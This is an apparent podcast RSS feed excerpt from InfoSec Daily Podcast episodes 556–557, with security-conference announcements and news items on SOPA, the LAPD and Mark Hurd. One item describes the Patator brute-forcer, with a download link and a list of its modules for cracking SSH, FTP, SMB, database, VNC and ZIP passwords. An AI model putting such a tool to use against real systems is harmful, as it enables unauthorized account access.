	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Currently it supports the following modules:</span></p>
<ul>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ftp_login : Brute-force FTP</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ssh_login : Brute-force SSH</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">telnet_login : Brute-force Telnet</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">smtp_login : Brute-force SMTP</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">smtp_vrfy : Enumerate valid users using the SMTP VRFY command</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">smtp_rcpt : Enumerate valid users using the SMTP RCPT TO command</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">http_fuzz : Brute-force HTTP/HTTPS</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">pop_passd : Brute-force poppassd (not POP3)</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ldap_login : Brute-force LDAP</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">smb_login : Brute-force SMB</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">mssql_login : Brute-force MSSQL</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">oracle_login : Brute-force Oracle</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">mysql_login : Brute-force MySQL</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">pgsql_login : Brute-force PostgreSQL</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">vnc_login : Brute-force VNC</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">dns_forward : Forward lookup subdomains</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">dns_reverse : Reverse lookup subnets</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">snmp_login : Brute-force SNMPv1/2 and SNMPv3</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">unzip_pass : Brute-force the password of encrypted ZIP files</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">keystore_pass : Brute-force the password of Java keystore files</span></li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-557-resolutions-patator-diy-satellites-zonetransfer-me-censorship-porn-wiki/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3320/0/infosec-daily-podcast-episode-557.mp3" length="19688112" type="audio/mpeg" />
		<itunes:duration>0:00:01</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 557 for January 2, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Karthik Rangarajan, and Geordy Rostad.
	&#160;
Announcements:
Brad Smith (theNurse)
	We all know and love Brad [...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 557 for January 2, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Karthik Rangarajan, and Geordy Rostad.
	&#160;
Announcements:
Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	CampusCon 2012
	When: January 21, 2012
	Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland
	http://campuscon.hackingwit.com
	(from Baconzombie)
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	Discount Code:
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	Social Engineering Training
	When: March 5-9 
	Where: Seattle, Washington
	When: April 9-13 
	Where: Bristol, UK
	http://www.social-engineer.com/social-engineer-training
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open!
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;
Stories
Source: &#160;What are the InfoSec Daily Podcast members New Years Resolutions?

	Source: http://patator.googlecode.com/files/patator_v0.3.py
	Patator is a multi-purpose brute-forcer, with a modular design and a flexible usage. Basically the author got tired of using Medusa, Hydra, ncrack, metasploit auxiliary modules, nmap NSE scripts and the like because:

They either do not work or are not reliable (false negatives several times in the past)
They are slow (not multi-threaded or not testing multiple passwords within the same TCP connection)
They lack very useful features that are easy to code in python (eg. interactive runtime)


	Basically you should give Patator a try once you get disappointed by Medusa, Hydra or other brute-force tools and are about to code your own small script because Patator will allow you to:

Not write the same code over and over
Run multi-threaded
Benefit for useful features such as the interactive runtime commands, response logging, etc.


	Currently it supports the following modules:

ftp_login : Brute-force FTP
ssh_login : Brute-force SSH
telnet_login : Brute-force Telnet
smtp_login : Brute-force SMTP
smtp_vrfy : Enumerate valid users using the SMTP VRFY command
smtp_rcpt : Enumerate valid users using the SMTP RCPT TO command
http_fuzz : Brute-force HTTP/HTTPS
pop_passd : Brute-force poppassd (not POP3)
ldap_login : Brute-force LDAP
smb_login : Brute-force SMB
mssql_login : Brute-force MSSQL
oracle_login : Brute-force Oracle
mysql_login : Brute-force MySQL
pgsql_login : Brute-force PostgreSQL
vnc_login : Brute-force VNC
dns_forward : Forward lookup subdomains
dns_reverse : Reverse lookup subnets
snmp_login : Brute-force SNMPv1/2 and SNMPv3
unzip_pass : Brute-for[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 556 &#8211; Nuclear Option, LAPD, Hurd, Asshat Move, Apple Phishing, Geordy’s Top “6”</title>
		<link>http://www.isdpodcast.com/episode-556-nuclear-option-lapd-hurd-asshat-move-apple-phishing-geordys-top-6</link>
		<comments>http://www.isdpodcast.com/episode-556-nuclear-option-lapd-hurd-asshat-move-apple-phishing-geordys-top-6#comments</comments>
		<pubDate>Sat, 31 Dec 2011 02:04:42 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3316</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 556 for December 30, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Geordy Rostad. &#160; Announcements: Brad Smith (theNurse) We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 556 for December 30, 2011. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Geordy Rostad.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CampusCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 21, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland</span><br />
	<a href="http://campuscon.hackingwit.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://campuscon.hackingwit.com</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">(from Baconzombie)</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts January 24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code:</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.dailykos.com/story/2011/12/29/1049815/-Internet-giants-seriously-considering-nuclear-option-to-stop-SOPA"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.dailykos.com/story/2011/12/29/1049815/-Internet-giants-seriously-considering-nuclear-option-to-stop-SOPA</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">When the home pages of Google.com, Amazon.com, Facebook.com, and their Internet allies simultaneously turn black with anti-censorship warnings that ask users to contact politicians about a vote in the U.S. Congress the next day on SOPA, you&#39;ll know they&#39;re finally serious.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">True, it would be the political equivalent of a nuclear option&#8211;possibly drawing retributions from the the influential politicos backing SOPA and Protect IP&#8211;but one that could nevertheless be launched in 2012.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;There have been some serious discussions about that,&quot; says Markham Erickson, who heads the</span><a href="http://www.netcoalition.com/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:underline;vertical-align:baseline;">NetCoalition</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;"> trade association that counts Google, Amazon.com, eBay, and Yahoo as members. &quot;It has never happened before.&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&#8230;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.computerworld.com/s/article/9222932/Plans_to_migrate_LAPD_to_Google_s_cloud_apps_dropped"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.computerworld.com/s/article/9222932/Plans_to_migrate_LAPD_to_Google_s_cloud_apps_dropped</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Bad news [if you&rsquo;re a cloud aficionado&hellip;], apparently Google Inc.&rsquo;s cloud resident email and applications products have been rejected by a single component of the City of Los Angeles, namely the Los Angeles Police Department. Evidently, the products do not meet United States Department of Justice and Federal Bureau of Investigation security guidelines for law enforcement agencies (in this case CJIS). We do applaud the LAPD for it&rsquo;s decision to protect and defend it&rsquo;s confidential information.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://news.cnet.com/8301-30686_3-57349688-266/former-hp-ceo-mark-hurd-loses-appeal-to-keep-letter-sealed"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.cnet.com/8301-30686_3-57349688-266/former-hp-ceo-mark-hurd-loses-appeal-to-keep-letter-sealed</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Mark Hurd, Hewlett-Packard&#39;s former CEO and now the current president of Oracle, lost his fight in court this week to keep confidential a letter alleging sexual harassment.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A Delaware court ruled yesterday that Hurd had not established &quot;good cause&quot; to keep the letter under wraps. (Here&#39;s the </span><a href="http://www.scribd.com/doc/76720572/hurd-delware-supremecourt"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">court record</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">uploaded by </span><a href="http://allthingsd.com/20111229/hurd-loses-appeal-to-keep-accusers-letter-confidential/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">All Things Digital</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&#39;s Arik Hesseldahl.)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The letter in question is from </span><a href="http://news.cnet.com/8301-1001_3-20044745-92.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">lawyers representing Jodie Fisher</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, a sometime actress who worked as a contractor for HP to its board of directors. In the letter, she accuses Hurd of harassment that occurred from 2007 to 2009. And she also alleges that during one visit in 2008, Hurd told her about HP&#39;s then-confidential plan to acquire IT services EDS. The letter is being sought by investors, who are suing HP, accusing the company of not acting in the best interest of shareholders.</span><br />
